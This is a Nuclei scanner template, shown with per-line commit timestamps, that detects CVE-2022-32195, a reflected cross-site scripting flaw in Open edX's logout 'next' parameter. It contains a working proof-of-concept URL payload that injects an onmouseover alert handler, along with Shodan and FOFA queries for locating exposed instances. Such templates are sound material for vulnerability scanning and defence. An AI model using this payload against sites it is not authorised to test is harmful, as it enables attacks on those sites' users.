2022-08-13 07:11:50 +00:00
|
|
|
id: CVE-2022-32195
|
2022-08-06 19:47:02 +00:00
|
|
|
|
|
|
|
info:
|
2022-09-16 19:50:10 +00:00
|
|
|
name: Open edX <2022-06-06 - Cross-Site Scripting
|
2022-08-06 19:47:02 +00:00
|
|
|
author: arafatansari
|
2022-09-16 20:03:07 +00:00
|
|
|
severity: medium
|
2022-08-06 19:47:02 +00:00
|
|
|
description: |
|
2022-09-16 19:50:10 +00:00
|
|
|
Open edX before 2022-06-06 contains a reflected cross-site scripting vulnerability via the 'next' parameter in the logout URL.
|
2023-09-27 15:51:13 +00:00
|
|
|
impact: |
|
|
|
|
Allows attackers to inject malicious scripts into web pages viewed by users, leading to potential data theft or unauthorized actions.
|
2023-09-06 11:59:08 +00:00
|
|
|
remediation: |
|
|
|
|
Apply the latest security patches or updates provided by Open edX to fix the Cross-Site Scripting vulnerability.
|
2022-08-06 19:47:02 +00:00
|
|
|
reference:
|
|
|
|
- https://discuss.openedx.org/t/security-patch-for-logout-page-xss-vulnerability/7408
|
2022-08-14 05:17:00 +00:00
|
|
|
- https://github.com/edx
|
2022-09-16 19:50:10 +00:00
|
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2022-32195
|
2024-01-29 17:11:14 +00:00
|
|
|
- https://github.com/ARPSyndicate/cvemon
|
|
|
|
- https://github.com/ARPSyndicate/kenzer-templates
|
2022-08-08 20:26:09 +00:00
|
|
|
classification:
|
2022-09-16 20:03:07 +00:00
|
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
|
|
|
cvss-score: 6.1
|
2022-09-16 19:50:10 +00:00
|
|
|
cve-id: CVE-2022-32195
|
2022-09-16 20:03:07 +00:00
|
|
|
cwe-id: CWE-79
|
2024-01-14 13:49:27 +00:00
|
|
|
epss-score: 0.00112
|
2024-05-31 19:23:20 +00:00
|
|
|
epss-percentile: 0.44633
|
2023-09-06 11:59:08 +00:00
|
|
|
cpe: cpe:2.3:a:edx:open_edx:*:*:*:*:*:*:*:*
|
2022-08-06 19:47:02 +00:00
|
|
|
metadata:
|
2023-06-04 08:13:42 +00:00
|
|
|
verified: true
|
2023-09-06 11:59:08 +00:00
|
|
|
max-request: 1
|
2023-07-11 19:49:27 +00:00
|
|
|
vendor: edx
|
|
|
|
product: open_edx
|
2024-06-07 10:04:29 +00:00
|
|
|
shodan-query:
|
|
|
|
- http.html:"Open edX"
|
|
|
|
- http.html:"open edx"
|
2024-05-31 19:23:20 +00:00
|
|
|
fofa-query: body="open edx"
|
2024-06-07 10:04:29 +00:00
|
|
|
comment: Hover the cursor on the redirect link
|
2023-12-05 09:50:33 +00:00
|
|
|
tags: cve,cve2022,openedx,xss,edx
|
2022-08-06 19:47:02 +00:00
|
|
|
|
2023-04-27 04:28:59 +00:00
|
|
|
http:
|
2022-08-06 19:47:02 +00:00
|
|
|
- method: GET
|
|
|
|
path:
|
2022-08-06 20:15:45 +00:00
|
|
|
- '{{BaseURL}}/logout?next=%208%22onmouseover=%22alert(document.domain)'
|
2022-08-06 19:47:02 +00:00
|
|
|
|
|
|
|
matchers-condition: and
|
|
|
|
matchers:
|
2022-08-06 20:15:45 +00:00
|
|
|
- type: word
|
|
|
|
part: body
|
|
|
|
words:
|
|
|
|
- '<a href="+8"onmouseover="alert(document.domain)">click here to go to'
|
2022-08-06 19:47:02 +00:00
|
|
|
|
|
|
|
- type: word
|
2022-08-06 20:15:45 +00:00
|
|
|
part: header
|
2022-08-06 19:47:02 +00:00
|
|
|
words:
|
2022-08-06 20:15:45 +00:00
|
|
|
- text/html
|
|
|
|
|
|
|
|
- type: status
|
|
|
|
status:
|
|
|
|
- 200
|
2024-06-08 16:02:17 +00:00
|
|
|
# digest: 490a0046304402207652323e36773cda99a552c2c3db55d052ec4a36ad6784bf01a87fc0aeecbfb7022077b69cfd1b8531ef9042fd4490a489b8d80dd8ebc2ec8612ec96b0c3ff6bc8ea:922c64590222798bb761d5b6d8e72950
|